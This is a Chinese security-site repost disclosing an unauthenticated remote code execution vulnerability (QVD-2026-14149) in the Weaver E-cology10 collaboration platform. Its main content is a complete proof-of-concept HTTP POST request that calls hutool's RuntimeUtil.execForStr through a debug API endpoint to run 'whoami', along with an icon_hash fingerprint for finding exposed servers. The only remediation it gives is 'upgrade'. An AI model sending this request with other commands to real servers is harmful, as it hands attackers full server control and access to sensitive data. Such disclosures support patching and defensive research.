2026-04-26 04:39:46 网络安全文章来源：ZONE.CI 全球网 0 阅读模式

文章总结： 该文档披露泛微E-cology10协同平台存在远程代码执行漏洞(QVD-2026-14149)，攻击者无需认证即可通过向/papi/esearch/data/devops/dubboApi/debug/method接口发送恶意POST请求在服务器执行任意命令。文章包含完整的漏洞POC代码（如执行whoami命令的请求示例）及资产测绘特征（icon_hash=-1619753057），建议用户立即升级至最新安全版本以修复漏洞。 综合评分： 82 文章分类： 漏洞分析,漏洞POC,WEB安全,应用安全,安全工具

cover_image

泛微E-cology10存在远程代码执行漏洞附POC

原创

安服仔安服仔

北风漏洞复现文库

2026年3月24日 09:58 广东

在小说阅读器读本章

去阅读

免责声明：请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

—

漏洞名称

泛微E-cology10存在远程代码执行漏洞(QVD-2026-14149)

—

影响版本

—

漏洞简介

泛微E-cology10是一款面向中大型组织的数智化协同运营平台，定位为企业级数字化中枢，核心覆盖协同办公、流程管理、业务集成、知识管理、低代码开发等全场景能力。泛微E-cology10存在远程代码执行漏洞，攻击者无需认证，可通过向特定接口发送恶意请求，在目标服务器上执行任意代码，完全控制服务器，导致敏感数据泄露或系统沦陷。

—

资产测绘

icon_hash="-1619753057"

—

漏洞复现

POC

POST&nbsp;/papi/esearch/data/devops/dubboApi/debug/method?interfaceName=cn.hutool.core.util.RuntimeUtil&methodName=execForStr&nbsp;HTTP/1.1Host:&nbsp;127.0.0.1User-Agent:&nbsp;Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0Accept:&nbsp;application/json, text/plain, */*Accept-Language:&nbsp;zh-CN,zh;q=0.9,zh-TW;q=0.8,zh-HK;q=0.7,en-US;q=0.6,en;q=0.5Accept-Encoding:&nbsp;gzip, deflateContent-Type:&nbsp;application/json;charset=utf-8timeZoneOffset:&nbsp;-480langType:&nbsp;zh_CNContent-Length:&nbsp;12Connection:&nbsp;closeSec-Fetch-Dest:&nbsp;emptySec-Fetch-Mode:&nbsp;corsSec-Fetch-Site:&nbsp;same-origin
[["whoami"]]

—

修复建议

升级至最新安全版本

—

往期回顾

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：北风漏洞复现文库安服仔安服仔《泛微E-cology10存在远程代码执行漏洞附POC》